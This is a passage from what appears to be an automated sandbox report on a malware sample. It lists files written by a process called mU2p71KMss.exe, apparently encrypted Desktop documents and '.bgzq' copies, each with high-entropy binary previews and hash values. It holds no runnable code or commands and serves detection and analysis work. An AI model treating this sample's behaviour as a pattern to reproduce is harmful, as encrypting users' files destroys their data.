                                                                                                Preview:DUUDT.H..<..wB..!7d..$.3..T.F7..^.v#..k.H...$...AW...V.%C......K.Ccq.?*.....[..r.Y.tA...].@..~(..<...9.....0#y[.....r.9.........s..b....MDC]..G3.D\.Q....k.uuJ....f.S..-...O6.A%`.G..=c....5......b..v.`..Nf._........._BO\....O2!.?.MM+.......9L.......MY.rv.U6}.w........9@.MVq.....~.6.8..HO...E..^=...3..T*X..\....d..S.<.......:.V.T...........]_...*h8`.bQ.D.... ..._w.."..w*.Q...T..9x.D........7./X.ru.m)v.&'.W#........2l.~s.....dy/........(..B.Xvn.Oh8/.....5...[M......iN....j!.b7.,.}.\4.|....J.0...l-.8;'.t...1k.*.0#d..&3.["..Dd.5-j.T...=O..#=.B.kfB.........9.#.H..-%..z@t.FF..v.....G..MCQ...=./0.....T....dTJ....-.....s$.aQG....&.0......U..7........M.3.3-...V.H.sKOV.b~.M....h..Pf..7......b.'.|..]"...c$G.v..@@.v36.K9.kc)...jRT^...[.C.....!{...._.....=.$.........d.....Y...J5U....a..._r..".t...-.;.o.....d....+......gJ....f..Q|c....'M..sM...FpY...F.w.cQ]]..|[...'....:y....S..1.....7..O0..]/...As...........EK........<m.bc.^Mk9.Hmu.....)..5

                                                                                                C:\Users\user\Desktop\DUUDTUBZFW.pdf.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.821952928002138
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:SDrKhC7ZtRmj3pJtAI0eQNmXX6K0ynzQbPt+FXeNYlW+8msbqpXfzIbD:SSQZPyGjfu6KfzaP8qdkfzSD
                                                                                                MD5:69161881C1B89A6C4AB7DF90C16F0E7F
                                                                                                SHA1:CA839513A32C383E7540105C5F1489A8D1822C1D
                                                                                                SHA-256:3B3322C9687FC5D75E4F708057BC61483A45F10DB307B533934732CE9877CB93
                                                                                                SHA-512:02C29813F789937FD1F86D111980BBF155361DBBA0587DD78A6D491CBA1DE05F7385AC72A0B45D9B028C58A42C0B7AD250C3581AE65AA2B11A1BB9E5F54A9C39
                                                                                                Malicious:false
                                                                                                Preview:DUUDT.H..<..wB..!7d..$.3..T.F7..^.v#..k.H...$...AW...V.%C......K.Ccq.?*.....[..r.Y.tA...].@..~(..<...9.....0#y[.....r.9.........s..b....MDC]..G3.D\.Q....k.uuJ....f.S..-...O6.A%`.G..=c....5......b..v.`..Nf._........._BO\....O2!.?.MM+.......9L.......MY.rv.U6}.w........9@.MVq.....~.6.8..HO...E..^=...3..T*X..\....d..S.<.......:.V.T...........]_...*h8`.bQ.D.... ..._w.."..w*.Q...T..9x.D........7./X.ru.m)v.&'.W#........2l.~s.....dy/........(..B.Xvn.Oh8/.....5...[M......iN....j!.b7.,.}.\4.|....J.0...l-.8;'.t...1k.*.0#d..&3.["..Dd.5-j.T...=O..#=.B.kfB.........9.#.H..-%..z@t.FF..v.....G..MCQ...=./0.....T....dTJ....-.....s$.aQG....&.0......U..7........M.3.3-...V.H.sKOV.b~.M....h..Pf..7......b.'.|..]"...c$G.v..@@.v36.K9.kc)...jRT^...[.C.....!{...._.....=.$.........d.....Y...J5U....a..._r..".t...-.;.o.....d....+......gJ....f..Q|c....'M..sM...FpY...F.w.cQ]]..|[...'....:y....S..1.....7..O0..]/...As...........EK........<m.bc.^Mk9.Hmu.....)..5

                                                                                                C:\Users\user\Desktop\EEGWXUHVUG.docx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.84771129903333
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:GmW4aQ93Mi8er4xz5j1lz878fCWG6yw9I4LkYSI5+OdpNciFwQqXfzIbD:GmWtQFMivr4xh1i78fZGPw9IRWD/wBf2
                                                                                                MD5:DE10489B15CF0BBC10B392D15F1CDD5D
                                                                                                SHA1:90BBD52B54E35D87B412D81C3E4ACAEBA5B9F2F5
                                                                                                SHA-256:15CA3C117C8D8E5A81B339CBA5005032883D8BD858D690957AA3EEBE990989F9
                                                                                                SHA-512:39297D6D54FEB0F2B5B5AB39EE0D25A0B8E4984E8863922961EAC6DF0E196D877591432FBA4BD11215B9212A50E0985863460A8D40E8729EB0BC61897BC21735
                                                                                                Malicious:false
                                                                                                Preview:EEGWX..e...H...8.+.......w^..W..&..../..:....c..9...q.O|c.>R1....5..2E.p..XA.h.Ri....&.v..5N.Z0..........J.<.~..Z.>.<...7.M.@.~..8.hT..u..S..R+......W..n_...PZ.r.^....$...\5...@.".`.e.D..s.....sb"...L.t...(J._.X..!..;n2.{.%..,(.Nww...+..._.<....d0~....!....Rt..\.... O...%....e.~...'..4.}.........pe_At...r..A..c`.T.70...x".0L).0.g..\..n...-.........-0...:...........`.....cI".Q...'5..`....?&.]..~....,..%A.c9\.~#.@N .....z.s.kK..M<...L.H..V..d..FZ..../.-.~$.....r9...{U.m.-.....%......x5....If..9l-.w..&..T)d.b.....6(.@.ze....{..i.u...5]lq..]. ..y.)D..,...cT..m.Y.. .O...;.....c@...f.6...0.z..6..'...R..L...t.=..S.o.....Wu{.6...".{$..z)xn+.q.@9.'.P..XU..",.[.D>.Q.2..<3I.{.'.....SBG...".p................=/f...zEw.k.tF3.yb%..P.I....*....q..!R..LO...8x..)..B.N........s|7Gq......[S.x...^x..w.0....HJ<$.1O"..t.h`n.[...^.....Y...z.n=y....$...(.D......#.Njw...<.cJ4*.o+m.#..>.r.[6AU:...J`.n...[....0]....f...~.x.YZ.`..}.f.@...8h.:..?."3...V..u..4o....[

                                                                                                C:\Users\user\Desktop\EEGWXUHVUG.docx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.84771129903333
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:GmW4aQ93Mi8er4xz5j1lz878fCWG6yw9I4LkYSI5+OdpNciFwQqXfzIbD:GmWtQFMivr4xh1i78fZGPw9IRWD/wBf2
                                                                                                MD5:DE10489B15CF0BBC10B392D15F1CDD5D
                                                                                                SHA1:90BBD52B54E35D87B412D81C3E4ACAEBA5B9F2F5
                                                                                                SHA-256:15CA3C117C8D8E5A81B339CBA5005032883D8BD858D690957AA3EEBE990989F9
                                                                                                SHA-512:39297D6D54FEB0F2B5B5AB39EE0D25A0B8E4984E8863922961EAC6DF0E196D877591432FBA4BD11215B9212A50E0985863460A8D40E8729EB0BC61897BC21735
                                                                                                Malicious:false
                                                                                                Preview:EEGWX..e...H...8.+.......w^..W..&..../..:....c..9...q.O|c.>R1....5..2E.p..XA.h.Ri....&.v..5N.Z0..........J.<.~..Z.>.<...7.M.@.~..8.hT..u..S..R+......W..n_...PZ.r.^....$...\5...@.".`.e.D..s.....sb"...L.t...(J._.X..!..;n2.{.%..,(.Nww...+..._.<....d0~....!....Rt..\.... O...%....e.~...'..4.}.........pe_At...r..A..c`.T.70...x".0L).0.g..\..n...-.........-0...:...........`.....cI".Q...'5..`....?&.]..~....,..%A.c9\.~#.@N .....z.s.kK..M<...L.H..V..d..FZ..../.-.~$.....r9...{U.m.-.....%......x5....If..9l-.w..&..T)d.b.....6(.@.ze....{..i.u...5]lq..]. ..y.)D..,...cT..m.Y.. .O...;.....c@...f.6...0.z..6..'...R..L...t.=..S.o.....Wu{.6...".{$..z)xn+.q.@9.'.P..XU..",.[.D>.Q.2..<3I.{.'.....SBG...".p................=/f...zEw.k.tF3.yb%..P.I....*....q..!R..LO...8x..)..B.N........s|7Gq......[S.x...^x..w.0....HJ<$.1O"..t.h`n.[...^.....Y...z.n=y....$...(.D......#.Njw...<.cJ4*.o+m.#..>.r.[6AU:...J`.n...[....0]....f...~.x.YZ.`..}.f.@...8h.:..?."3...V..u..4o....[

                                                                                                C:\Users\user\Desktop\EEGWXUHVUG.pdf

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.861312561133502
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ALxG275/YF7S6M0Z39OsMgY4pKA1fBCmJrzskPAas1/3QAyLOx7e/p3tTvk9Jm9Z:yYk/YZTM0Z3D+4pKgfBNJrjw/Pyk7iyC
                                                                                                MD5:924DEDF508388C711FEC4B51447B488E
                                                                                                SHA1:18B7AB145A30219A36DB4060559200FA4A0C43E8
                                                                                                SHA-256:1625B0B04056F07AEF018334846802063B945A241790CB95E7DBFFD851537566
                                                                                                SHA-512:35FFCDA162042C400C3D0AFBCBB39FF5330A1C1210707963AC73F32F7CBCF3ECD8A2DAEC685122203FD7DB5AFCD385F7F459965394C0747590CA3027CD4A3DAE
                                                                                                Malicious:false
                                                                                                Preview:EEGWX.%...>.b>.o.<.Eg.N.V...m.....\F.N.e..j...K..=....:......5.....I5...........X..m..1&>.-.\%J.&.-...*..t...'..i..o/.3`.....K..lhth.v1Q....y...m..E...I.8..(v.n..?j.Y}.{..B..pB.~.N4...V.%.o........$..D&O.V.4.x.kX.|....34;:^-.,.....~.P..)._a....Y02.!..Y...c....ey.3f.'}$.&.Jt..z.......FX.OH..m~.!.........I...)].f.q.L..p4.1.p._.K.9)3N.f.S....O......RW!LR.._=.....F....c.X../#...(.r...H.W.~....`.M.B.1....wgU.o.."u0D:....IN5wk....<..y....l!....[...o...|..............:...9A...@..dm..K.~..95.n..2...u.q.0{O./..*..n`...xH..g.........T.61'P.1....@G.}..A[..."....,.GqX..'..O...v..4....w-0..Gj.._=Ja..L..x.Wt1.}F..%...y2=.........D.'.M.m....C.._[.it..D.!.".g}.9'.I&.6.a.an.<?.....r...F........"&....\...<....\%.4v../..&.j.."....+.q1_.L.?....z..+&........0....r.....$..%-.[..q8.1.sj5...Q?ep.i...7.a>..3...i>......P57.vX...5.w~.+n.Y..`.x.hA.v.f..miNd.H._..............:......[.=.....T..b..I....R...A......w.xR..S....p..I..EI......t:....s..1...l.e4...$l.

                                                                                                C:\Users\user\Desktop\EEGWXUHVUG.pdf.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.861312561133502
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ALxG275/YF7S6M0Z39OsMgY4pKA1fBCmJrzskPAas1/3QAyLOx7e/p3tTvk9Jm9Z:yYk/YZTM0Z3D+4pKgfBNJrjw/Pyk7iyC
                                                                                                MD5:924DEDF508388C711FEC4B51447B488E
                                                                                                SHA1:18B7AB145A30219A36DB4060559200FA4A0C43E8
                                                                                                SHA-256:1625B0B04056F07AEF018334846802063B945A241790CB95E7DBFFD851537566
                                                                                                SHA-512:35FFCDA162042C400C3D0AFBCBB39FF5330A1C1210707963AC73F32F7CBCF3ECD8A2DAEC685122203FD7DB5AFCD385F7F459965394C0747590CA3027CD4A3DAE
                                                                                                Malicious:false
                                                                                                Preview:EEGWX.%...>.b>.o.<.Eg.N.V...m.....\F.N.e..j...K..=....:......5.....I5...........X..m..1&>.-.\%J.&.-...*..t...'..i..o/.3`.....K..lhth.v1Q....y...m..E...I.8..(v.n..?j.Y}.{..B..pB.~.N4...V.%.o........$..D&O.V.4.x.kX.|....34;:^-.,.....~.P..)._a....Y02.!..Y...c....ey.3f.'}$.&.Jt..z.......FX.OH..m~.!.........I...)].f.q.L..p4.1.p._.K.9)3N.f.S....O......RW!LR.._=.....F....c.X../#...(.r...H.W.~....`.M.B.1....wgU.o.."u0D:....IN5wk....<..y....l!....[...o...|..............:...9A...@..dm..K.~..95.n..2...u.q.0{O./..*..n`...xH..g.........T.61'P.1....@G.}..A[..."....,.GqX..'..O...v..4....w-0..Gj.._=Ja..L..x.Wt1.}F..%...y2=.........D.'.M.m....C.._[.it..D.!.".g}.9'.I&.6.a.an.<?.....r...F........"&....\...<....\%.4v../..&.j.."....+.q1_.L.?....z..+&........0....r.....$..%-.[..q8.1.sj5...Q?ep.i...7.a>..3...i>......P57.vX...5.w~.+n.Y..`.x.hA.v.f..miNd.H._..............:......[.=.....T..b..I....R...A......w.xR..S....p..I..EI......t:....s..1...l.e4...$l.

                                                                                                C:\Users\user\Desktop\EEGWXUHVUG\DUUDTUBZFW.pdf

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.8602751330093525
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Vy3w2rS2oov4xqKLfHHxsmRAZFrqEoHFpZITyAO12iBJAlvtfXfzIbD:VYvoov400RpuFSHD+OAM2LZfzSD
                                                                                                MD5:613507DAEFA08B8DE94468DB6D1B99C2
                                                                                                SHA1:52E8E3D0310A8AC4301ADC991ED00F0B3E008B31
                                                                                                SHA-256:5B72CCF1B4DF66AA31A07BB31EE111BA367B6FA73DFDF6B1BE58B607AD9BDE8C
                                                                                                SHA-512:8F7949E193EAE014DDD75A23DBCDD9F02058BDAABE8D0E7FF368D3986FEF2F278AEAE23CE76425B1E161ABB92CC55B6F6511BFC3DA1D1950C7D7189C3628F607
                                                                                                Malicious:false
                                                                                                Preview:DUUDT...@f.h..;.mb.k....1M...r....j......VM,.W....!... Y)........n..J. G.....|.Y..!&.o..e...4..1.../o,..V..".c.B..A....0l...l.P$/tR.?.|`2L.K....V!'..F....C.....x.Q..b......:)oL....S|........+..P.4.g.].;......[.i..U....>...+A.....aZR..Y-....c.zBOnW..Yu...k..t..=.a..ti]...?...+.x..s..&.).....K}"...W-..X...T..a.f.TN.1.K.8D...w....W.a..@..{.@..}}...a)d..6~..5.....,p*.i..:Q..Q..A}o..".l........X.6..>....$....zg..FR...5...)...*.......o.H....@.>..a.5.~.....r.<.S....)7%D...[.....E.p....B..../v.Ah[.K]..(9.gT.H..h..m.!....f...u>V.@..N6.\p..#W.W]3Y..:.i.....d.v......5..".:..L.4>..D^.....uT.=b....].j.......f..%...,............9.._v./.....g..L......;.%^(...-....b....n..0S.w.$+e...4>...6.Q+....I}u....+g...9M.)YF5g7.a.'....6."...k....&:..B @.L.~..@.8.O.k..........v.../.O.......*....^..u....E@cg......7u....5.q._....Lj.V.}'r......D..._...R.e@.m`.]..a@..q.k.w..X.....Lk.v.<fL......!<....:*+.%fP...BQ..d..i...}h..@..h..f..S,..'..i..+..p...m.l.d..

                                                                                                C:\Users\user\Desktop\EEGWXUHVUG\DUUDTUBZFW.pdf.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.8602751330093525
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Vy3w2rS2oov4xqKLfHHxsmRAZFrqEoHFpZITyAO12iBJAlvtfXfzIbD:VYvoov400RpuFSHD+OAM2LZfzSD
                                                                                                MD5:613507DAEFA08B8DE94468DB6D1B99C2
                                                                                                SHA1:52E8E3D0310A8AC4301ADC991ED00F0B3E008B31
                                                                                                SHA-256:5B72CCF1B4DF66AA31A07BB31EE111BA367B6FA73DFDF6B1BE58B607AD9BDE8C
                                                                                                SHA-512:8F7949E193EAE014DDD75A23DBCDD9F02058BDAABE8D0E7FF368D3986FEF2F278AEAE23CE76425B1E161ABB92CC55B6F6511BFC3DA1D1950C7D7189C3628F607
                                                                                                Malicious:false
                                                                                                Preview:DUUDT...@f.h..;.mb.k....1M...r....j......VM,.W....!... Y)........n..J. G.....|.Y..!&.o..e...4..1.../o,..V..".c.B..A....0l...l.P$/tR.?.|`2L.K....V!'..F....C.....x.Q..b......:)oL....S|........+..P.4.g.].;......[.i..U....>...+A.....aZR..Y-....c.zBOnW..Yu...k..t..=.a..ti]...?...+.x..s..&.).....K}"...W-..X...T..a.f.TN.1.K.8D...w....W.a..@..{.@..}}...a)d..6~..5.....,p*.i..:Q..Q..A}o..".l........X.6..>....$....zg..FR...5...)...*.......o.H....@.>..a.5.~.....r.<.S....)7%D...[.....E.p....B..../v.Ah[.K]..(9.gT.H..h..m.!....f...u>V.@..N6.\p..#W.W]3Y..:.i.....d.v......5..".:..L.4>..D^.....uT.=b....].j.......f..%...,............9.._v./.....g..L......;.%^(...-....b....n..0S.w.$+e...4>...6.Q+....I}u....+g...9M.)YF5g7.a.'....6."...k....&:..B @.L.~..@.8.O.k..........v.../.O.......*....^..u....E@cg......7u....5.q._....Lj.V.}'r......D..._...R.e@.m`.]..a@..q.k.w..X.....Lk.v.<fL......!<....:*+.%fP...BQ..d..i...}h..@..h..f..S,..'..i..+..p...m.l.d..

                                                                                                C:\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.878131249714626
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:HrO7jNQo7GDsk2qNpNaEvG5BHSKBhIxviYugA1nL+H8EOs2H/AG5Jak28XfzIbD:E5rGwcNpNyPUEJq8EO/AG5JaKfzSD
                                                                                                MD5:3C7C9698909173C111963D65743D65F4
                                                                                                SHA1:259093F4CC7F57DC47E68787308770FD142D85B1
                                                                                                SHA-256:FD84C561358D4623113C218DC1E908493F751AF02C07D20B918C327C12B9FCE1
                                                                                                SHA-512:8055C390C70244F4542C7498D61B1169F3C825585BD6BAB74E70D850AA8927338681569FD7BB21D9A5BE3AC0D1BC59B9A3BF0A655B3CF07D839A17AAB1C597D5
                                                                                                Malicious:true
                                                                                                Preview:EEGWX...........r....L.0.1...A].T.A.:WT.K;...p.WyS.Ti..fQ....E.(L..i.1.......=...|.G.".7.......k.....K.x.X...F.=....|$..e..u.}.)A zH..sMS.*/\....+.2b.R....y.<n.w.l7.T.^......{.v7.SD-_..l......../.&....S....pt.....m.4 .....C].i.."..|.d%..t.Q/.o.=..;#..)(B.:..i(D2.4.1...|7..KL......x..l.t.T...Y{...X.r.N.b...V..s.a.S.J......'.}c...g?........U/...f....J7...e.;N|D..~.V#).........?.p..O...q.CP...f,...7F..]'.J.O..T.._.~.o..m16.....yf.,`mx...P.........|.n..b.....l.......3.j U'V..~.j.._.@..^...D...]lZ.]s..B...6`.~}..\..|....K,....ND..2......e...d}Y\....jB..~.w\..F4#......o$.xq...o .)&.*......,.Y.v....0.u[..a.....V.k..h..z........._+..$G...(...O.......fG;B...........Rj.../..~.4~.'.0.k....<........Q%T._.}.*..2`h.r...]...r...0{V.z...e.+.....3a.4.-Z.g...~..Yx....-<{z.!...o..c.$..hk......6&[I..O....+.A..g....Y..?.)-.Q.`_.X.nv...L.....!}....M.Z.x...Y.h.Bn3...^.<o.)....c{..T..O.....t&........dCS..<.S6..1.>o.....b....t.E..9..;..Z.z..........

                                                                                                C:\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.878131249714626
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:HrO7jNQo7GDsk2qNpNaEvG5BHSKBhIxviYugA1nL+H8EOs2H/AG5Jak28XfzIbD:E5rGwcNpNyPUEJq8EO/AG5JaKfzSD
                                                                                                MD5:3C7C9698909173C111963D65743D65F4
                                                                                                SHA1:259093F4CC7F57DC47E68787308770FD142D85B1
                                                                                                SHA-256:FD84C561358D4623113C218DC1E908493F751AF02C07D20B918C327C12B9FCE1
                                                                                                SHA-512:8055C390C70244F4542C7498D61B1169F3C825585BD6BAB74E70D850AA8927338681569FD7BB21D9A5BE3AC0D1BC59B9A3BF0A655B3CF07D839A17AAB1C597D5
                                                                                                Malicious:false
                                                                                                Preview:EEGWX...........r....L.0.1...A].T.A.:WT.K;...p.WyS.Ti..fQ....E.(L..i.1.......=...|.G.".7.......k.....K.x.X...F.=....|$..e..u.}.)A zH..sMS.*/\....+.2b.R....y.<n.w.l7.T.^......{.v7.SD-_..l......../.&....S....pt.....m.4 .....C].i.."..|.d%..t.Q/.o.=..;#..)(B.:..i(D2.4.1...|7..KL......x..l.t.T...Y{...X.r.N.b...V..s.a.S.J......'.}c...g?........U/...f....J7...e.;N|D..~.V#).........?.p..O...q.CP...f,...7F..]'.J.O..T.._.~.o..m16.....yf.,`mx...P.........|.n..b.....l.......3.j U'V..~.j.._.@..^...D...]lZ.]s..B...6`.~}..\..|....K,....ND..2......e...d}Y\....jB..~.w\..F4#......o$.xq...o .)&.*......,.Y.v....0.u[..a.....V.k..h..z........._+..$G...(...O.......fG;B...........Rj.../..~.4~.'.0.k....<........Q%T._.}.*..2`h.r...]...r...0{V.z...e.+.....3a.4.-Z.g...~..Yx....-<{z.!...o..c.$..hk......6&[I..O....+.A..g....Y..?.)-.Q.`_.X.nv...L.....!}....M.Z.x...Y.h.Bn3...^.<o.)....c{..T..O.....t&........dCS..<.S6..1.>o.....b....t.E..9..;..Z.z..........

                                                                                                C:\Users\user\Desktop\EEGWXUHVUG\EIVQSAOTAQ.jpg

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.837137414547966
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:REBQraDj7YB+XcS4A1HkSgs/n1W88XJgcxV4GwxptbgShPX3tkcheOQRnsUPmZ9W:6BQra3EBkDb+2qgKW1bgUY4UPmZ3Ongu
                                                                                                MD5:2909EDD167D2CE9338C7A5BCA60B7C79
                                                                                                SHA1:7FCF315250021C2009D0276ECDE458781DE32468
                                                                                                SHA-256:F58388EBC6D9A6B72AF84D7F06B22FA23C042585D829B7258B11B12F3725863F
                                                                                                SHA-512:654CEED69B2757A60192CE81AF407CD94EBD13E9D23E9322719DE51609AB27E7C77CF4302F032722091A084DF710F537926BC464DF996693684BE82E6B9893E0
                                                                                                Malicious:false
                                                                                                Preview:EIVQS..k[....M./*..)..~;.o.%.@.'.Mr.*..K....I.:!..?.$UA..iz....kK).2.u.Wy..<.ZC..g&.5W.....fE.F=..E8..Ky..7$....)_..UW#3.fAoD..Mkx....7...K.[.....}......+{.:m.......k..5..'....U!..?.d..S...tYl..)..C.........@#..L!..^.~w7.?....'g.!.Q./.S.R.M..=!<.f......q......'../.;wM.WVl.ANz....S..IO..f........:.G.s-.9]N..E#ytY/.....5<......0..t%.-.b'......Yq.#..g.,..7.6.t...{.Jr.`..\{K.9....u.#b.X.R..OR...Z.L...??]....1Tc)4.Uc8..m..6...OJ.C"..$..k.?.3..se\!.,~l..Ae;0...ox...;..}........K....w.k@&.3.~.......o.GX...@B..JN.sG.|..3.3?M>]......kF..(.>..._.|..Lo...l$...7i.......}6.R...a...3...]fx..C.@..;4L.L.........p.P..@..!D.m....I.C...{/.....^.gk...[b.M. @..Ra....Z...?.VW...2.%.....9iw......983g............`fVv6..>.e..1...(.30.:..|...CZl...RE.H.o.>e`...../..F.7..Q......T}1..b .`.X.}....v.....p8F;l?Y...AN......D..Ry..+.V.....=, ..b.(3....H......#..r..%..].$..W...T.U....f......5.%.....t1v.&.D..X2H..)..'n...9..B....&....2.F.J."B..W'..z{K.Wh.

                                                                                                C:\Users\user\Desktop\EEGWXUHVUG\EIVQSAOTAQ.jpg.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.837137414547966
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:REBQraDj7YB+XcS4A1HkSgs/n1W88XJgcxV4GwxptbgShPX3tkcheOQRnsUPmZ9W:6BQra3EBkDb+2qgKW1bgUY4UPmZ3Ongu
                                                                                                MD5:2909EDD167D2CE9338C7A5BCA60B7C79
                                                                                                SHA1:7FCF315250021C2009D0276ECDE458781DE32468
                                                                                                SHA-256:F58388EBC6D9A6B72AF84D7F06B22FA23C042585D829B7258B11B12F3725863F
                                                                                                SHA-512:654CEED69B2757A60192CE81AF407CD94EBD13E9D23E9322719DE51609AB27E7C77CF4302F032722091A084DF710F537926BC464DF996693684BE82E6B9893E0
                                                                                                Malicious:false
                                                                                                Preview:EIVQS..k[....M./*..)..~;.o.%.@.'.Mr.*..K....I.:!..?.$UA..iz....kK).2.u.Wy..<.ZC..g&.5W.....fE.F=..E8..Ky..7$....)_..UW#3.fAoD..Mkx....7...K.[.....}......+{.:m.......k..5..'....U!..?.d..S...tYl..)..C.........@#..L!..^.~w7.?....'g.!.Q./.S.R.M..=!<.f......q......'../.;wM.WVl.ANz....S..IO..f........:.G.s-.9]N..E#ytY/.....5<......0..t%.-.b'......Yq.#..g.,..7.6.t...{.Jr.`..\{K.9....u.#b.X.R..OR...Z.L...??]....1Tc)4.Uc8..m..6...OJ.C"..$..k.?.3..se\!.,~l..Ae;0...ox...;..}........K....w.k@&.3.~.......o.GX...@B..JN.sG.|..3.3?M>]......kF..(.>..._.|..Lo...l$...7i.......}6.R...a...3...]fx..C.@..;4L.L.........p.P..@..!D.m....I.C...{/.....^.gk...[b.M. @..Ra....Z...?.VW...2.%.....9iw......983g............`fVv6..>.e..1...(.30.:..|...CZl...RE.H.o.>e`...../..F.7..Q......T}1..b .`.X.}....v.....p8F;l?Y...AN......D..Ry..+.V.....=, ..b.(3....H......#..r..%..].$..W...T.U....f......5.%.....t1v.&.D..X2H..)..'n...9..B....&....2.F.J."B..W'..z{K.Wh.

                                                                                                C:\Users\user\Desktop\EEGWXUHVUG\GRXZDKKVDB.xlsx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.832325177705575
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:S4opFBHtyv0qykHXkcxzZhq6WmVQXL11I4pjlQx5qtuwy+lXfzIbD:bohHoCk3kcxbqdL/I+pQx5q9FfzSD
                                                                                                MD5:6D68AF535BB23FA9C1280BAFDFF9C445
                                                                                                SHA1:5AD58DB7710890492240FE0226BF609DA48EC67D
                                                                                                SHA-256:85689CD81D2505A3ED5FD28AA3AC0BB65F4C117C31FCEA2B8F95D3E7829C93F8
                                                                                                SHA-512:E9C49D73A04B89340D57C39297524EA18604C4B97C8895C76D596D94486F410097719985A6DCE65F17E2CE5B754ED6A7459C714D120767AE79095D43015AE539
                                                                                                Malicious:false
                                                                                                Preview:GRXZDx...<I...b..Up...p-...... ........ ....5...JnK.C~...Fe......o.Vm.....~.?.f.N.w./^j.^.H...n.g....e$..l...9..n...3...w..N.....~.!.V%}#..^.......Qi..#.J..S.].nH.%.[.....E.x.z.M...A.%....Xgc7.4.[.\..'........y..o._gF.+8...,r...vA....|{..F.x....u.....s......qm..\7.d...a.......X..X......u.8.u#=..f.-..R......v....dA...Q4..`D,.J...b>e..<...O.r.i.Ck...{8!d,.s7..z$....F+..~.8.`...t.[=..&u..c..r*.z..`. .F.f/'....w@....d U..h....*....X...P..y...]-PT.......V_N.Pw.Mh3.'m...=.O..eS.Hu..0k.Vj....y...q..ru..Xu2....?....{.'..1.".T...3..7A...[<..=.|..S.]....9.K.........J.....f.Y.h.Uv.W.l......3...K]..I.4...G.k........L!..^.de...>.n..5".2.~.K...9Y[..,.....O.`.l>DP..>p].4.#....|.r..C.h.&..m..S..A.-S6..a...B.2.@U...-.@.s..3....|Q....B|....7M.*B9.r....f$.if...y."3...w5..&0&...q....f.{.D..F2.G..fET:........[..nL0.`i.F.t..~. .S.......|.y".gN].D8.m(W..Sm...C.j........&..d.s.|..5}...x.+>J=u....4W..A.^.$.u|..y].l>].{.%..v..|..D.m_.K.....izm~.0I...H

                                                                                                C:\Users\user\Desktop\EEGWXUHVUG\GRXZDKKVDB.xlsx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.832325177705575
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:S4opFBHtyv0qykHXkcxzZhq6WmVQXL11I4pjlQx5qtuwy+lXfzIbD:bohHoCk3kcxbqdL/I+pQx5q9FfzSD
                                                                                                MD5:6D68AF535BB23FA9C1280BAFDFF9C445
                                                                                                SHA1:5AD58DB7710890492240FE0226BF609DA48EC67D
